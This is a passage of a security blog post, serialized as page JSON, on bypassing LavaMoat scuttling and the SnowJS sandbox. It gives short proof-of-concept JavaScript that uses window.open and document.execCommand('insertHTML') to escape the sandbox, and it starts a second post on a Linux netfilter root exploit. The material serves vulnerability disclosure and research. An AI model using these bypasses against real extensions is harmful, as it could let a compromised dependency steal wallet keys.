assertValidJS(sourceMeta.code)\n",{"type":28,"tag":63,"props":49120,"children":49122},{"id":49121},"hacking-js-realms",[49123],{"type":33,"value":49124},"Hacking JS Realms",{"type":28,"tag":29,"props":49126,"children":49127},{},[49128,49130,49135],{"type":33,"value":49129},"Lavamoat scuttling removes unnecessary and dangerous attributes from the ",{"type":28,"tag":98,"props":49131,"children":49133},{"className":49132},[],[49134],{"type":33,"value":37041},{"type":33,"value":49136}," object. However, this can be easily bypassed when Lavamoat is running in a browser context.",{"type":28,"tag":234,"props":49138,"children":49140},{"className":31015,"code":49139,"language":31017,"meta":7,"style":7},"const w = window.open('/non_existent');\nw.alert(document.domain)\n",[49141],{"type":28,"tag":98,"props":49142,"children":49143},{"__ignoreMap":7},[49144,49186],{"type":28,"tag":116,"props":49145,"children":49146},{"class":245,"line":246},[49147,49151,49156,49160,49164,49168,49173,49177,49182],{"type":28,"tag":116,"props":49148,"children":49149},{"style":376},[49150],{"type":33,"value":9323},{"type":28,"tag":116,"props":49152,"children":49153},{"style":272},[49154],{"type":33,"value":49155}," w",{"type":28,"tag":116,"props":49157,"children":49158},{"style":370},[49159],{"type":33,"value":2226},{"type":28,"tag":116,"props":49161,"children":49162},{"style":272},[49163],{"type":33,"value":31059},{"type":28,"tag":116,"props":49165,"children":49166},{"style":266},[49167],{"type":33,"value":141},{"type":28,"tag":116,"props":49169,"children":49170},{"style":282},[49171],{"type":33,"value":49172},"open",{"type":28,"tag":116,"props":49174,"children":49175},{"style":266},[49176],{"type":33,"value":313},{"type":28,"tag":116,"props":49178,"children":49179},{"style":563},[49180],{"type":33,"value":49181},"'/non_existent'",{"type":28,"tag":116,"props":49183,"children":49184},{"style":266},[49185],{"type":33,"value":895},{"type":28,"tag":116,"props":49187,"children":49188},{"class":245,"line":256},[49189,49194,49198,49202,49206,49210,49214,49218],{"type":28,"tag":116,"props":49190,"children":49191},{"style":272},[49192],{"type":33,"value":49193},"w",{"type":28,"tag":116,"props":49195,"children":49196},{"style":266},[49197],{"type":33,"value":141},{"type":28,"tag":116,"props":49199,"children":49200},{"style":282},[49201],{"type":33,"value":32336},{"type":28,"tag":116,"props":49203,"children":49204},{"style":266},[49205],{"type":33,"value":313},{"type":28,"tag":116,"props":49207,"children":49208},{"style":272},[49209],{"type":33,"value":1156},{"type":28,"tag":116,"props":49211,"children":49212},{"style":266},[49213],{"type":33,"value":141},{"type":28,"tag":116,"props":49215,"children":49216},{"style":272},[49217],{"type":33,"value":32355},{"type":28,"tag":116,"props":49219,"children":49220},{"style":266},[49221],{"type":33,"value":2830},{"type":28,"tag":29,"props":49223,"children":49224},{},[49225,49227,49232],{"type":33,"value":49226},"This opens a new window with a new JS Realm (another ",{"type":28,"tag":98,"props":49228,"children":49230},{"className":49229},[],[49231],{"type":33,"value":37041},{"type":33,"value":49233}," object), and uses it to execute code in the context of the scuttled window. Note that the window needs to be same-origin and must not be scuttled.",{"type":28,"tag":29,"props":49235,"children":49236},{},[49237,49239,49246],{"type":33,"value":49238},"As a mitigation, some applications integrate SnowJS with scuttling, so every new same-origin window and iframe will be detected and scuttled (check the ",{"type":28,"tag":87,"props":49240,"children":49243},{"href":49241,"rel":49242},"https://github.com/MetaMask/metamask-extension/blob/3996f505a6a156d96077acb49579e6fc9e78cd45/app/scripts/use-snow.js#L22",[91],[49244],{"type":33,"value":49245},"Metamask implementation",{"type":33,"value":1829},{"type":28,"tag":75,"props":49248,"children":49250},{"id":49249},"snowjs-attack-surface",[49251],{"type":33,"value":49252},"SnowJS Attack Surface",{"type":28,"tag":29,"props":49254,"children":49255},{},[49256],{"type":33,"value":49257},"SnowJS is a javascript sandbox implementation that secures same-origin realms in browser applications. It is configured to detect new realms and attach them to the sandbox.",{"type":28,"tag":29,"props":49259,"children":49260},{},[49261,49263,49270],{"type":33,"value":49262},"As a mechanism, it hooks functions that can be used to create realms (an iframe, for example). For example, here are some of the ",{"type":28,"tag":87,"props":49264,"children":49267},{"href":49265,"rel":49266},"https://github.com/LavaMoat/snow/blob/ecf1add05c774b90b8baeff934b2e40585e13ca4/src/inserters.js#L9",[91],[49268],{"type":33,"value":49269},"hooked inserters",{"type":33,"value":49271}," functions:",{"type":28,"tag":234,"props":49273,"children":49275},{"className":31015,"code":49274,"language":31017,"meta":7,"style":7},"const map = {\n    Range: ['insertNode'],\n    DocumentFragment: ['replaceChildren', 'append', 'prepend'],\n    Document: ['replaceChildren', 'append', 'prepend', 'write', 'writeln'],\n    Node: ['appendChild', 'insertBefore', 'replaceChild'],\n    Element: ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'replaceWith', 'insertAdjacentElement', 'append', 'before', 'prepend', 'after', 'replaceChildren'],\n    ShadowRoot: ['innerHTML'],\n    HTMLIFrameElement: ['srcdoc'],\n};\n",[49276],{"type":28,"tag":98,"props":49277,"children":49278},{"__ignoreMap":7},[49279,49299,49320,49359,49413,49452,49551,49571,49592],{"type":28,"tag":116,"props":49280,"children":49281},{"class":245,"line":246},[49282,49286,49291,49295],{"type":28,"tag":116,"props":49283,"children":49284},{"style":376},[49285],{"type":33,"value":9323},{"type":28,"tag":116,"props":49287,"children":49288},{"style":272},[49289],{"type":33,"value":49290}," map",{"type":28,"tag":116,"props":49292,"children":49293},{"style":370},[49294],{"type":33,"value":2226},{"type":28,"tag":116,"props":49296,"children":49297},{"style":266},[49298],{"type":33,"value":1291},{"type":28,"tag":116,"props":49300,"children":49301},{"class":245,"line":256},[49302,49307,49311,49316],{"type":28,"tag":116,"props":49303,"children":49304},{"style":272},[49305],{"type":33,"value":49306},"    Range:",{"type":28,"tag":116,"props":49308,"children":49309},{"style":266},[49310],{"type":33,"value":22695},{"type":28,"tag":116,"props":49312,"children":49313},{"style":563},[49314],{"type":33,"value":49315},"'insertNode'",{"type":28,"tag":116,"props":49317,"children":49318},{"style":266},[49319],{"type":33,"value":13929},{"type":28,"tag":116,"props":49321,"children":49322},{"class":245,"line":293},[49323,49328,49332,49337,49341,49346,49350,49355],{"type":28,"tag":116,"props":49324,"children":49325},{"style":272},[49326],{"type":33,"value":49327},"    DocumentFragment:",{"type":28,"tag":116,"props":49329,"children":49330},{"style":266},[49331],{"type":33,"value":22695},{"type":28,"tag":116,"props":49333,"children":49334},{"style":563},[49335],{"type":33,"value":49336},"'replaceChildren'",{"type":28,"tag":116,"props":49338,"children":49339},{"style":266},[49340],{"type":33,"value":825},{"type":28,"tag":116,"props":49342,"children":49343},{"style":563},[49344],{"type":33,"value":49345},"'append'",{"type":28,"tag":116,"props":49347,"children":49348},{"style":266},[49349],{"type":33,"value":825},{"type":28,"tag":116,"props":49351,"children":49352},{"style":563},[49353],{"type":33,"value":49354},"'prepend'",{"type":28,"tag":116,"props":49356,"children":49357},{"style":266},[49358],{"type":33,"value":13929},{"type":28,"tag":116,"props":49360,"children":49361},{"class":245,"line":361},[49362,49367,49371,49375,49379,49383,49387,49391,49395,49400,49404,49409],{"type":28,"tag":116,"props":49363,"children":49364},{"style":272},[49365],{"type":33,"value":49366},"    Document:",{"type":28,"tag":116,"props":49368,"children":49369},{"style":266},[49370],{"type":33,"value":22695},{"type":28,"tag":116,"props":49372,"children":49373},{"style":563},[49374],{"type":33,"value":49336},{"type":28,"tag":116,"props":49376,"children":49377},{"style":266},[49378],{"type":33,"value":825},{"type":28,"tag":116,"props":49380,"children":49381},{"style":563},[49382],{"type":33,"value":49345},{"type":28,"tag":116,"props":49384,"children":49385},{"style":266},[49386],{"type":33,"value":825},{"type":28,"tag":116,"props":49388,"children":49389},{"style":563},[49390],{"type":33,"value":49354},{"type":28,"tag":116,"props":49392,"children":49393},{"style":266},[49394],{"type":33,"value":825},{"type":28,"tag":116,"props":49396,"children":49397},{"style":563},[49398],{"type":33,"value":49399},"'write'",{"type":28,"tag":116,"props":49401,"children":49402},{"style":266},[49403],{"type":33,"value":825},{"type":28,"tag":116,"props":49405,"children":49406},{"style":563},[49407],{"type":33,"value":49408},"'writeln'",{"type":28,"tag":116,"props":49410,"children":49411},{"style":266},[49412],{"type":33,"value":13929},{"type":28,"tag":116,"props":49414,"children":49415},{"class":245,"line":387},[49416,49421,49425,49430,49434,49439,49443,49448],{"type":28,"tag":116,"props":49417,"children":49418},{"style":272},[49419],{"type":33,"value":49420},"    Node:",{"type":28,"tag":116,"props":49422,"children":49423},{"style":266},[49424],{"type":33,"value":22695},{"type":28,"tag":116,"props":49426,"children":49427},{"style":563},[49428],{"type":33,"value":49429},"'appendChild'",{"type":28,"tag":116,"props":49431,"children":49432},{"style":266},[49433],{"type":33,"value":825},{"type":28,"tag":116,"props":49435,"children":49436},{"style":563},[49437],{"type":33,"value":49438},"'insertBefore'",{"type":28,"tag":116,"props":49440,"children":49441},{"style":266},[49442],{"type":33,"value":825},{"type":28,"tag":116,"props":49444,"children":49445},{"style":563},[49446],{"type":33,"value":49447},"'replaceChild'",{"type":28,"tag":116,"props":49449,"children":49450},{"style":266},[49451],{"type":33,"value":13929},{"type":28,"tag":116,"props":49453,"children":49454},{"class":245,"line":400},[49455,49460,49464,49469,49473,49478,49482,49487,49491,49496,49500,49505,49509,49513,49517,49522,49526,49530,49534,49539,49543,49547],{"type":28,"tag":116,"props":49456,"children":49457},{"style":272},[49458],{"type":33,"value":49459},"    Element:",{"type":28,"tag":116,"props":49461,"children":49462},{"style":266},[49463],{"type":33,"value":22695},{"type":28,"tag":116,"props":49465,"children":49466},{"style":563},[49467],{"type":33,"value":49468},"'innerHTML'",{"type":28,"tag":116,"props":49470,"children":49471},{"style":266},[49472],{"type":33,"value":825},{"type":28,"tag":116,"props":49474,"children":49475},{"style":563},[49476],{"type":33,"value":49477},"'outerHTML'",{"type":28,"tag":116,"props":49479,"children":49480},{"style":266},[49481],{"type":33,"value":825},{"type":28,"tag":116,"props":49483,"children":49484},{"style":563},[49485],{"type":33,"value":49486},"'insertAdjacentHTML'",{"type":28,"tag":116,"props":49488,"children":49489},{"style":266},[49490],{"type":33,"value":825},{"type":28,"tag":116,"props":49492,"children":49493},{"style":563},[49494],{"type":33,"value":49495},"'replaceWith'",{"type":28,"tag":116,"props":49497,"children":49498},{"style":266},[49499],{"type":33,"value":825},{"type":28,"tag":116,"props":49501,"children":49502},{"style":563},[49503],{"type":33,"value":49504},"'insertAdjacentElement'",{"type":28,"tag":116,"props":49506,"children":49507},{"style":266},[49508],{"type":33,"value":825},{"type":28,"tag":116,"props":49510,"children":49511},{"style":563},[49512],{"type":33,"value":49345},{"type":28,"tag":116,"props":49514,"children":49515},{"style":266},[49516],{"type":33,"value":825},{"type":28,"tag":116,"props":49518,"children":49519},{"style":563},[49520],{"type":33,"value":49521},"'before'",{"type":28,"tag":116,"props":49523,"children":49524},{"style":266},[49525],{"type":33,"value":825},{"type":28,"tag":116,"props":49527,"children":49528},{"style":563},[49529],{"type":33,"value":49354},{"type":28,"tag":116,"props":49531,"children":49532},{"style":266},[49533],{"type":33,"value":825},{"type":28,"tag":116,"props":49535,"children":49536},{"style":563},[49537],{"type":33,"value":49538},"'after'",{"type":28,"tag":116,"props":49540,"children":49541},{"style":266},[49542],{"type":33,"value":825},{"type":28,"tag":116,"props":49544,"children":49545},{"style":563},[49546],{"type":33,"value":49336},{"type":28,"tag":116,"props":49548,"children":49549},{"style":266},[49550],{"type":33,"value":13929},{"type":28,"tag":116,"props":49552,"children":49553},{"class":245,"line":614},[49554,49559,49563,49567],{"type":28,"tag":116,"props":49555,"children":49556},{"style":272},[49557],{"type":33,"value":49558},"    ShadowRoot:",{"type":28,"tag":116,"props":49560,"children":49561},{"style":266},[49562],{"type":33,"value":22695},{"type":28,"tag":116,"props":49564,"children":49565},{"style":563},[49566],{"type":33,"value":49468},{"type":28,"tag":116,"props":49568,"children":49569},{"style":266},[49570],{"type":33,"value":13929},{"type":28,"tag":116,"props":49572,"children":49573},{"class":245,"line":631},[49574,49579,49583,49588],{"type":28,"tag":116,"props":49575,"children":49576},{"style":272},[49577],{"type":33,"value":49578},"    HTMLIFrameElement:",{"type":28,"tag":116,"props":49580,"children":49581},{"style":266},[49582],{"type":33,"value":22695},{"type":28,"tag":116,"props":49584,"children":49585},{"style":563},[49586],{"type":33,"value":49587},"'srcdoc'",{"type":28,"tag":116,"props":49589,"children":49590},{"style":266},[49591],{"type":33,"value":13929},{"type":28,"tag":116,"props":49593,"children":49594},{"class":245,"line":665},[49595],{"type":28,"tag":116,"props":49596,"children":49597},{"style":266},[49598],{"type":33,"value":16239},{"type":28,"tag":29,"props":49600,"children":49601},{},[49602],{"type":33,"value":49603},"This means that an attacker can't use any of these functions to create an iframe and bypass the snowJS sandbox, because it will detect the new frame and include it in the sandbox.",{"type":28,"tag":29,"props":49605,"children":49606},{},[49607],{"type":33,"value":49608},"Unfortunately, client-side javascript is surprisingly complex with lots of strange behaviours that could be used to bypass the hook security feature.",{"type":28,"tag":75,"props":49610,"children":49612},{"id":49611},"bypassing-snowjs",[49613],{"type":33,"value":49614},"Bypassing SnowJS",{"type":28,"tag":29,"props":49616,"children":49617},{},[49618,49620,49631,49633,49639],{"type":33,"value":49619},"The deprecated ",{"type":28,"tag":87,"props":49621,"children":49624},{"href":49622,"rel":49623},"https://developer.mozilla.org/en-US/docs/Web/API/Document/execCommand",[91],[49625],{"type":28,"tag":98,"props":49626,"children":49628},{"className":49627},[],[49629],{"type":33,"value":49630},"document.execCommand",{"type":33,"value":49632}," function is used to execute commands inside a ",{"type":28,"tag":98,"props":49634,"children":49636},{"className":49635},[],[49637],{"type":33,"value":49638},"contenteditable",{"type":33,"value":49640}," focused context. Despite this being a deprecated function, it is still supported by modern browsers.",{"type":28,"tag":234,"props":49642,"children":49644},{"className":476,"code":49643,"language":478,"meta":7,"style":7},"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\n",[49645],{"type":28,"tag":98,"props":49646,"children":49647},{"__ignoreMap":7},[49648],{"type":28,"tag":116,"props":49649,"children":49650},{"class":245,"line":246},[49651,49655,49659,49663,49667,49672,49677,49682,49686,49690],{"type":28,"tag":116,"props":49652,"children":49653},{"style":488},[49654],{"type":33,"value":514},{"type":28,"tag":116,"props":49656,"children":49657},{"style":376},[49658],{"type":33,"value":201},{"type":28,"tag":116,"props":49660,"children":49661},{"style":272},[49662],{"type":33,"value":680},{"type":28,"tag":116,"props":49664,"children":49665},{"style":266},[49666],{"type":33,"value":373},{"type":28,"tag":116,"props":49668,"children":49669},{"style":563},[49670],{"type":33,"value":49671},"test",{"type":28,"tag":116,"props":49673,"children":49674},{"style":272},[49675],{"type":33,"value":49676}," contenteditable",{"type":28,"tag":116,"props":49678,"children":49679},{"style":272},[49680],{"type":33,"value":49681}," autofocus",{"type":28,"tag":116,"props":49683,"children":49684},{"style":488},[49685],{"type":33,"value":587},{"type":28,"tag":116,"props":49687,"children":49688},{"style":376},[49689],{"type":33,"value":201},{"type":28,"tag":116,"props":49691,"children":49692},{"style":488},[49693],{"type":33,"value":506},{"type":28,"tag":29,"props":49695,"children":49696},{},[49697,49699,49705,49707,49712],{"type":33,"value":49698},"After inserting this element to a page, it is possible to use ",{"type":28,"tag":98,"props":49700,"children":49702},{"className":49701},[],[49703],{"type":33,"value":49704},"insertHTML",{"type":33,"value":49706}," command of ",{"type":28,"tag":98,"props":49708,"children":49710},{"className":49709},[],[49711],{"type":33,"value":49630},{"type":33,"value":49713}," to add a non-sandboxed iframe.",{"type":28,"tag":234,"props":49715,"children":49717},{"className":31015,"code":49716,"language":31017,"meta":7,"style":7},"document.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\n",[49718],{"type":28,"tag":98,"props":49719,"children":49720},{"__ignoreMap":7},[49721],{"type":28,"tag":116,"props":49722,"children":49723},{"class":245,"line":246},[49724,49728,49732,49737,49741,49746,49750,49754,49758,49763],{"type":28,"tag":116,"props":49725,"children":49726},{"style":272},[49727],{"type":33,"value":1156},{"type":28,"tag":116,"props":49729,"children":49730},{"style":266},[49731],{"type":33,"value":141},{"type":28,"tag":116,"props":49733,"children":49734},{"style":282},[49735],{"type":33,"value":49736},"execCommand",{"type":28,"tag":116,"props":49738,"children":49739},{"style":266},[49740],{"type":33,"value":313},{"type":28,"tag":116,"props":49742,"children":49743},{"style":563},[49744],{"type":33,"value":49745},"'insertHTML'",{"type":28,"tag":116,"props":49747,"children":49748},{"style":266},[49749],{"type":33,"value":825},{"type":28,"tag":116,"props":49751,"children":49752},{"style":376},[49753],{"type":33,"value":7847},{"type":28,"tag":116,"props":49755,"children":49756},{"style":266},[49757],{"type":33,"value":825},{"type":28,"tag":116,"props":49759,"children":49760},{"style":563},[49761],{"type":33,"value":49762},"'\u003Ciframe srcdoc=\"aaa\">'",{"type":28,"tag":116,"props":49764,"children":49765},{"style":266},[49766],{"type":33,"value":895},{"type":28,"tag":75,"props":49768,"children":49770},{"id":49769},"impact-on-lavamoat-scuttling",[49771],{"type":33,"value":49772},"Impact On Lavamoat Scuttling",{"type":28,"tag":29,"props":49774,"children":49775},{},[49776],{"type":33,"value":49777},"As it is recommended to use snowJS integrated with Lavamoat scuttling to prevent bypasses, it is possible to completely bypass the scuttling feature without pre-conditions.",{"type":28,"tag":29,"props":49779,"children":49780},{},[49781,49783,49788,49790,49795],{"type":33,"value":49782},"For the exploit, the only used functions are in ",{"type":28,"tag":98,"props":49784,"children":49786},{"className":49785},[],[49787],{"type":33,"value":1156},{"type":33,"value":49789}," object, which can never be scuttled once it is a non-writable and non-configurable property in ",{"type":28,"tag":98,"props":49791,"children":49793},{"className":49792},[],[49794],{"type":33,"value":37041},{"type":33,"value":49796}," object.",{"type":28,"tag":29,"props":49798,"children":49799},{},[49800,49802,49807],{"type":33,"value":49801},"Consider this example, which runs a scuttled ",{"type":28,"tag":98,"props":49803,"children":49805},{"className":49804},[],[49806],{"type":33,"value":32336},{"type":33,"value":25123},{"type":28,"tag":234,"props":49809,"children":49811},{"className":31015,"code":49810,"language":31017,"meta":7,"style":7},"document.body.innerHTML = \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\";\ndocument.getElementById('test').focus();\ndocument.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\ndocument.getElementsByTagName('iframe')[0].contentWindow.alert(document.domain);\n",[49812],{"type":28,"tag":98,"props":49813,"children":49814},{"__ignoreMap":7},[49815,49851,49888,49931],{"type":28,"tag":116,"props":49816,"children":49817},{"class":245,"line":246},[49818,49822,49826,49830,49834,49838,49842,49847],{"type":28,"tag":116,"props":49819,"children":49820},{"style":272},[49821],{"type":33,"value":1156},{"type":28,"tag":116,"props":49823,"children":49824},{"style":266},[49825],{"type":33,"value":141},{"type":28,"tag":116,"props":49827,"children":49828},{"style":272},[49829],{"type":33,"value":624},{"type":28,"tag":116,"props":49831,"children":49832},{"style":266},[49833],{"type":33,"value":141},{"type":28,"tag":116,"props":49835,"children":49836},{"style":272},[49837],{"type":33,"value":34599},{"type":28,"tag":116,"props":49839,"children":49840},{"style":370},[49841],{"type":33,"value":2226},{"type":28,"tag":116,"props":49843,"children":49844},{"style":563},[49845],{"type":33,"value":49846}," \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\"",{"type":28,"tag":116,"props":49848,"children":49849},{"style":266},[49850],{"type":33,"value":384},{"type":28,"tag":116,"props":49852,"children":49853},{"class":245,"line":256},[49854,49858,49862,49866,49870,49875,49879,49884],{"type":28,"tag":116,"props":49855,"children":49856},{"style":272},[49857],{"type":33,"value":1156},{"type":28,"tag":116,"props":49859,"children":49860},{"style":266},[49861],{"type":33,"value":141},{"type":28,"tag":116,"props":49863,"children":49864},{"style":282},[49865],{"type":33,"value":34624},{"type":28,"tag":116,"props":49867,"children":49868},{"style":266},[49869],{"type":33,"value":313},{"type":28,"tag":116,"props":49871,"children":49872},{"style":563},[49873],{"type":33,"value":49874},"'test'",{"type":28,"tag":116,"props":49876,"children":49877},{"style":266},[49878],{"type":33,"value":1484},{"type":28,"tag":116,"props":49880,"children":49881},{"style":282},[49882],{"type":33,"value":49883},"focus",{"type":28,"tag":116,"props":49885,"children":49886},{"style":266},[49887],{"type":33,"value":1445},{"type":28,"tag":116,"props":49889,"children":49890},{"class":245,"line":293},[49891,49895,49899,49903,49907,49911,49915,49919,49923,49927],{"type":28,"tag":116,"props":49892,"children":49893},{"style":272},[49894],{"type":33,"value":1156},{"type":28,"tag":116,"props":49896,"children":49897},{"style":266},[49898],{"type":33,"value":141},{"type":28,"tag":116,"props":49900,"children":49901},{"style":282},[49902],{"type":33,"value":49736},{"type":28,"tag":116,"props":49904,"children":49905},{"style":266},[49906],{"type":33,"value":313},{"type":28,"tag":116,"props":49908,"children":49909},{"style":563},[49910],{"type":33,"value":49745},{"type":28,"tag":116,"props":49912,"children":49913},{"style":266},[49914],{"type":33,"value":825},{"type":28,"tag":116,"props":49916,"children":49917},{"style":376},[49918],{"type":33,"value":7847},{"type":28,"tag":116,"props":49920,"children":49921},{"style":266},[49922],{"type":33,"value":825},{"type":28,"tag":116,"props":49924,"children":49925},{"style":563},[49926],{"type":33,"value":49762},{"type":28,"tag":116,"props":49928,"children":49929},{"style":266},[49930],{"type":33,"value":895},{"type":28,"tag":116,"props":49932,"children":49933},{"class":245,"line":361},[49934,49938,49942,49947,49951,49955,49960,49964,49969,49974,49978,49982,49986,49990,49994,49998],{"type":28,"tag":116,"props":49935,"children":49936},{"style":272},[49937],{"type":33,"value":1156},{"type":28,"tag":116,"props":49939,"children":49940},{"style":266},[49941],{"type":33,"value":141},{"type":28,"tag":116,"props":49943,"children":49944},{"style":282},[49945],{"type":33,"value":49946},"getElementsByTagName",{"type":28,"tag":116,"props":49948,"children":49949},{"style":266},[49950],{"type":33,"value":313},{"type":28,"tag":116,"props":49952,"children":49953},{"style":563},[49954],{"type":33,"value":36354},{"type":28,"tag":116,"props":49956,"children":49957},{"style":266},[49958],{"type":33,"value":49959},")[",{"type":28,"tag":116,"props":49961,"children":49962},{"style":350},[49963],{"type":33,"value":353},{"type":28,"tag":116,"props":49965,"children":49966},{"style":266},[49967],{"type":33,"value":49968},"].",{"type":28,"tag":116,"props":49970,"children":49971},{"style":272},[49972],{"type":33,"value":49973},"contentWindow",{"type":28,"tag":116,"props":49975,"children":49976},{"style":266},[49977],{"type":33,"value":141},{"type":28,"tag":116,"props":49979,"children":49980},{"style":282},[49981],{"type":33,"value":32336},{"type":28,"tag":116,"props":49983,"children":49984},{"style":266},[49985],{"type":33,"value":313},{"type":28,"tag":116,"props":49987,"children":49988},{"style":272},[49989],{"type":33,"value":1156},{"type":28,"tag":116,"props":49991,"children":49992},{"style":266},[49993],{"type":33,"value":141},{"type":28,"tag":116,"props":49995,"children":49996},{"style":272},[49997],{"type":33,"value":32355},{"type":28,"tag":116,"props":49999,"children":50000},{"style":266},[50001],{"type":33,"value":895},{"type":28,"tag":75,"props":50003,"children":50005},{"id":50004},"snowjs-patch",[50006],{"type":33,"value":50007},"SnowJS Patch",{"type":28,"tag":29,"props":50009,"children":50010},{},[50011,50013,50020,50022,50029],{"type":33,"value":50012},"Metamask is working on conceptual changes and aiming to integrate SnowJS as a ",{"type":28,"tag":87,"props":50014,"children":50017},{"href":50015,"rel":50016},"https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html#talk",[91],[50018],{"type":33,"value":50019},"browser feature within W3C standards",{"type":33,"value":50021},", with the intention of addressing not only this issue, but also all other well-known issues with SnowJS. ",{"type":28,"tag":87,"props":50023,"children":50026},{"href":50024,"rel":50025},"https://github.com/weizman/Realms-Initialization-Control",[91],[50027],{"type":33,"value":50028},"Here",{"type":33,"value":50030}," is their new proposal.",{"type":28,"tag":63,"props":50032,"children":50034},{"id":50033},"chaining-the-impacts",[50035],{"type":33,"value":50036},"Chaining The Impacts",{"type":28,"tag":29,"props":50038,"children":50039},{},[50040],{"type":33,"value":50041},"We were able to find two vulnerabilities in lavamoat project:",{"type":28,"tag":455,"props":50043,"children":50044},{},[50045,50050],{"type":28,"tag":459,"props":50046,"children":50047},{},[50048],{"type":33,"value":50049},"Policy File Bypass",{"type":28,"tag":459,"props":50051,"children":50052},{},[50053],{"type":33,"value":50054},"Scuttling Bypass",{"type":28,"tag":29,"props":50056,"children":50057},{},[50058],{"type":33,"value":50059},"By combining the exploits, it is possible to completely bypass lavamoat supply-chain protections using a compromised dependency.",{"type":28,"tag":29,"props":50061,"children":50062},{},[50063],{"type":33,"value":50064},"Using Metamask as an example, these exploits could be used to retrieve the encrypted keypair in extension storage. The only precondition would be compromising a NPM dependency.",{"type":28,"tag":63,"props":50066,"children":50067},{"id":2506},[50068],{"type":33,"value":2509},{"type":28,"tag":29,"props":50070,"children":50071},{},[50072],{"type":33,"value":50073},"The vulnerability within the Lavapack module sandboxing, along with the issues we discussed regarding SnowJs and the Scuttling feature, illustrate the complexities of mitigating supply chain attacks within the JavaScript ecosystem. While the lavapack release with a mitigation was available in under two days, the inherent complexity makes designing robust security implementations a challenging task.",{"type":28,"tag":201,"props":50075,"children":50076},{"style":203},[50077],{"type":28,"tag":206,"props":50078,"children":50081},{"src":50079,"alt":50080,"style":31006},"/posts/supply-chain-attacks-a-new-era/hello-otter.gif","Hello Otetr",[],{"type":28,"tag":18085,"props":50083,"children":50085},{"className":50084,"dataFootnotes":7},[18088],[50086,50091],{"type":28,"tag":63,"props":50087,"children":50089},{"className":50088,"id":15143},[18093],[50090],{"type":33,"value":18096},{"type":28,"tag":455,"props":50092,"children":50093},{},[50094],{"type":28,"tag":459,"props":50095,"children":50096},{"id":30021},[50097,50099,50106,50107],{"type":33,"value":50098},"Excluding SES, which was covered ",{"type":28,"tag":87,"props":50100,"children":50103},{"href":50101,"rel":50102},"https://osec.io/blog/2023-11-01-metamask-snaps",[91],[50104],{"type":33,"value":50105},"in our last article",{"type":33,"value":6129},{"type":28,"tag":87,"props":50108,"children":50110},{"href":30049,"ariaLabel":18199,"className":50109,"dataFootnoteBackref":7},[18201],[50111],{"type":33,"value":18204},{"type":28,"tag":2516,"props":50113,"children":50114},{},[50115],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":50117},[50118,50122,50128,50134,50135,50136],{"id":18619,"depth":256,"text":18622,"children":50119},[50120,50121],{"id":28670,"depth":293,"text":28673},{"id":46746,"depth":293,"text":46749},{"id":47501,"depth":256,"text":47504,"children":50123},[50124,50125,50126,50127],{"id":47751,"depth":293,"text":47754},{"id":48223,"depth":293,"text":48226},{"id":48880,"depth":293,"text":48883},{"id":49003,"depth":293,"text":49006},{"id":49121,"depth":256,"text":49124,"children":50129},[50130,50131,50132,50133],{"id":49249,"depth":293,"text":49252},{"id":49611,"depth":293,"text":49614},{"id":49769,"depth":293,"text":49772},{"id":50004,"depth":293,"text":50007},{"id":50033,"depth":256,"text":50036},{"id":2506,"depth":256,"text":2509},{"id":15143,"depth":256,"text":18096},"content:blog:2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era",{"_path":50141,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":50142,"description":50143,"author":50144,"image":50145,"date":50147,"isFeatured":19,"tags":50148,"onBlogPage":19,"body":50151,"_type":2534,"_id":60529,"_source":2536,"_file":60530,"_stem":60531,"_extension":2539},"/blog/2024-11-25-netfilter-universal-root-1-day","OtterRoot: Netfilter Universal Root 1-day","A peek into the state of Linux kernel security and the open-source patch-gap. We explore how we monitored commits to find new bug fixes and achieved 0day-like capabilities by exploiting a 1-day vulnerability.","pedro",{"src":50146,"height":8933,"width":5395},"/posts/netfilter-universal-root-1-day/cover.png","2024-11-25",[50149,50150],"kernal","linux",{"type":25,"children":50152,"toc":60497},[50153,50166,50180,50185,50191,50201,50206,50212,50217,50235,50249,50258,50291,50296,50302,50321,50354,50360,50373,50583,50650,51212,51231,51456,51515,51521,51541,51581,51769,51774,51925,51981,51986,52500,52519,52788,52814,53323,53390,53396,53432,53437,53703,53736,53748,53775,53787,53792,53798,53819,53825,53846,53869,54701,54707,54747,55287,55298,55332,55399,55453,55685,55691,55735,56199,56205,56216,56246,56329,56334,56339,56375,56427,56458,57013,57019,57036,57042,57047,57053,57081,57274,57294,57310,57904,57910,57945,57968,57980,57986,58014,58611,58636,59605,59616,59629,59642,60408,60422,60428,60440,60446,60474,60479,60483,60488,60493],{"type":28,"tag":29,"props":50154,"children":50155},{},[50156,50158,50165],{"type":33,"value":50157},"In late March, I attempted to monitor commits in Linux kernel subsystems that are hotspots for exploitable bugs, partially as an experiment to study how feasible it is to maintain LPE/container escape capabilities by patch-gapping/cycling 1-days, but also to submit to the ",{"type":28,"tag":87,"props":50159,"children":50162},{"href":50160,"rel":50161},"https://google.github.io/security-research/kernelctf/rules.html",[91],[50163],{"type":33,"value":50164},"KernelCTF VRP",{"type":33,"value":141},{"type":28,"tag":29,"props":50167,"children":50168},{},[50169,50171,50178],{"type":33,"value":50170},"During the research, I quickly came across an exploitable bug fixed in netfilter, which was labeled CVE-2024-26809 (originally discovered by ",{"type":28,"tag":87,"props":50172,"children":50175},{"href":50173,"rel":50174},"https://github.com/conlonialC",[91],[50176],{"type":33,"value":50177},"lonial con",{"type":33,"value":50179},") and was able to exploit it in the KernelCTF LTS instance and write a universal exploit that runs across different kernel builds without the need to recompile with different symbols or ROP gadgets.",{"type":28,"tag":29,"props":50181,"children":50182},{},[50183],{"type":33,"value":50184},"In this post, I'll discuss how I exploited a 1day to obtain 0day-like LPE/container escape capabilities for around two months by quickly abusing the patch-gap to write an exploit before the fix could go downstream. I'll also share my journey analyzing the patch to understand the bug, isolate the commit(s) that introduced it, exploit it in the KernelCTF VRP, and, finally, how I developed a universal exploit to target mainstream 